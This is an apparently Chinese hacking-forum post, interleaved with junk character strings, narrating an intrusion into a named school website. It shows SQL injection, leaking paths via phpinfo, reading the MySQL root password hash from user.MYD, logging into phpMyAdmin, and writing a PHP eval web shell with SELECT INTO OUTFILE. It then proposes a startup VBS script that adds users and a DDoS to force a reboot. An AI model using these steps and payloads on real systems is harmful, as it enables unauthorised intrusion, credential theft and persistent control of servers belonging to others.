第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏+ G9 I7 v( M1 M: U/ ^
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
. X" N _5 Y# a, t: ^9 X b6 ^1 C7 T& s$ w7 X
) G" I$ A! D, r1 Z6 ]
; x9 K9 }6 E F3 a, ]5 s1 \4 ~常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 # Z4 T# U1 k& ^. D1 Z
8 ]0 _3 K7 u: G7 i2 E% h9 }% X那么想可以直接写入shell ,getshell有几个条件:* J- f% t4 l7 S$ {. {0 f' C& I6 a
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
5 E1 X: F9 ?+ n$ g5 x a3 \/ {( [. a1 n: `, U4 X
试着爆绝对路径:
/ j2 N0 n" }5 }) K1./phpMyAdmin/index.php?lang[]=1 9 Q6 f5 A0 r8 i9 W' m
2./phpMyAdmin/phpinfo.php
5 Z# m J. B- d5 z3./load_file()
6 }% ?7 r' m' `& L4./phpmyadmin/themes/darkblue_orange/layout.inc.php 7 n( B: n& Q/ `
5./phpmyadmin/libraries/select_lang.lib.php
8 V4 b+ f: _% F; Y2 k1 M$ b6 @6./phpmyadmin/libraries/lect_lang.lib.php
" v% f$ ]: C$ \5 `. E7./phpmyadmin/libraries/mcrypt.lib.php
6 U5 M4 f$ x5 B% ?8./phpmyadmin/libraries/export/xls.php
, t, Y- J5 E( q( J1 M8 d3 r6 D' g. ], o3 z9 D
均不行........................... 9 h2 X! U h6 L( p; L
$ Q9 Y ]3 w. b7 b+ f/ j p
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
+ i" B% K) U# E+ Z
+ t6 w$ n/ V# T5 [9 n权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 4 s& o' i1 X1 d' Q) W% i
* y1 z2 \7 R0 u" V8 B默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ' f( R4 q8 H/ X$ f
7 W( J4 J# l+ M8 S1 u/ N( ^
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... + }2 ?# s* G& |+ c
7 G* x/ o% K# h: X想想root还可以读,读到root密码进phpmyadmin 也可以拿shell R4 t: }+ m$ n6 C0 h" I
0 a4 L7 @7 G1 c' C. F
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 m1 z9 e2 @. o% T' U
n, ?" ` L3 j) Y) v8 ~* ~自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
8 H: Z1 n, c' n4 a- Z0 m0 R0 A+ M Q
成功读到root密码: : D: v+ `" G" e+ o. J2 l
8 i9 `5 h3 \- d& q17---- r(0072)
& ]" H+ z/ P) }18---- o(006f) ' s: r' ]7 A$ @+ Y
19---- o(006f) C- X7 d( w& y, u7 ~" x3 W
20---- t(0074) . K& ^* I/ F9 L- G% B" H/ y( c5 ?7 f; Y) g
21---- *(002a)
" P7 {, {2 y' n22---- 8(0038) * l; W: J, g7 y9 n
23---- 2(0032)
% O h! R4 ], ^+ \/ |' Z. ]" A24---- E(0045) " |9 C5 y( C) c' M) r6 @: N/ B0 j
25---- 1(0031)
. H* G6 z) j- g+ E2 ~- [- |1 ?26---- C(0043)
' k! J0 N" r3 E+ V' f- q& T% |27---- 5(0035)
. F, N- d$ t! w) }1 ~28---- 8(0038)
, C3 Y7 p4 S) b; D/ a29---- 2(0032) 1 Q4 L- [/ U3 q. G( P2 L! i
30---- 8(0038)
$ j/ X1 }1 ?& P! W$ B31---- A(0041) 1 i7 J/ G* D1 M
32---- 9(0039) 8 Y7 G$ ?7 k. x7 n$ o
33---- B(0042) 7 |. V5 c& l$ O: P
34---- 5(0035) , s# N8 S% t. H
35---- 4(0034)
5 u: \! ?; A9 L/ U# R' b8 F! C36---- 8(0038)
# V& j8 D" j- V f1 O37---- 6(0036)
' A. q1 B6 N3 m38---- 4(0034) + D; o3 P7 y. _# @0 b2 F0 h4 g
39---- 9(0039)
$ D2 c1 m: k* b; ^40---- 1(0031)
5 f# u# M* i9 b9 ~, l/ }6 ]. @41---- 1(0031) ( H; `8 _9 _7 d, o L
42---- 5(0035) . N* M. g: n! x5 [1 o8 J7 z
43---- 3(0033)
( e9 Q" |4 Q- U% t% H44---- 5(0035)
; u+ k3 _+ O9 i: M9 ` [45---- 9(0039)
/ Y- F1 m4 e! g) ?+ o% b' h, ?46---- 8(0038) 1 K v& c5 w7 `# M8 D
47---- F(0046) 2 P5 B c/ ^- Y6 t( I0 K
48---- F(0046) # H9 j/ ]9 k! p
49---- 4(0034) 8 a) d' O9 d ?4 Q$ `! m8 c
50---- F(0046) $ M) b$ d1 i& V: J7 A
51---- 0(0030)
' v2 Y. g7 N) v5 |52---- 3(0033)
3 A. @5 t) N4 K53---- 2(0032) % e/ I4 w, f7 o3 d# V8 v
54---- A(0041)
( j1 Y& [8 |; a3 J0 w4 P7 X% j55---- 4(0034)
, `0 X$ l( g, G( o1 w56---- A(0041)
6 a4 L" w3 n8 U8 ]" G7 y57---- B(0042)
. q9 ~( c+ I$ I- W58---- *(0044)
: C1 n5 E/ s5 n6 N+ b* H* M59---- *(0035)
, p0 a' R0 V' ?" C" `, H \3 K60---- *(0041)
7 H& k/ `" j, [" K3 E0 F) u+ n4 O# D61---- *0032) ; j& t0 {& E: k/ p+ Y
% [- u2 U" U5 p- |( j解密后成功登陆phpmyamin
- P; r) [6 c( y
- {! q7 t1 ?* l& m' L9 s6 g. l8 A- }
" ~2 V2 F8 p o: Q5 ?/ Q$ u2 O. |: d
+ n% k5 G1 Z( L5 M+ W3 X( y5 I9 T( Y" e
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 3 }3 [8 X8 l a" k4 i; W
8 ]0 J! U6 Q7 N+ T: A/ ^5 ]
成功执行,拿下shell,菜刀连接:
+ y6 Q5 g1 v+ r( B0 l1 B4 u! Y4 t/ [3 w- ~' s+ M- M; {. g
服务器不支持asp,aspx,php提权无果...................
8 Y% j, q* Y- o0 D; f7 S( k2 v7 ] |) _! @
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 7 Y9 ~/ D+ C- }2 K( O0 Y& y6 D# w
服务器上已经有个隐藏帐号了
! _9 C' {3 i% T# G% V9 l6 I别名 administrators
) v- {. x0 m8 I' k2 Y注释 管理员对计算机/域有不受限制的完全访问权
6 q+ U: Q* a, S- x/ z& K& i成员 |4 X; A3 n3 U( c6 k; n9 q
-------------------------------------------------------------------------------* k# P; P* N/ k% y4 I0 Y
admin
7 B: \ l* }$ O. @8 HAdministrator1 I3 {4 T. o8 z4 J4 s- ^8 z! Y- W
slipper$+ d8 S) M" m) e7 V# d
sqluser* G* ?' H) ^- ?- E$ O- r6 g; R! j
命令成功完成。 / I; G9 k6 f$ e
0 ^0 g; I/ @! t. d" @服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
, e* I! J; y% y. p0 c3 M8 x9 a6 [/ K) y g) x) Y
ddos服务器重启,不然就只能坐等服务器重启了...............................
" M2 c" H0 t. t. E7 }4 w3 i* V; s) k T! s+ F
7 j2 h- ]# Z+ c; @" g! n: L! |
|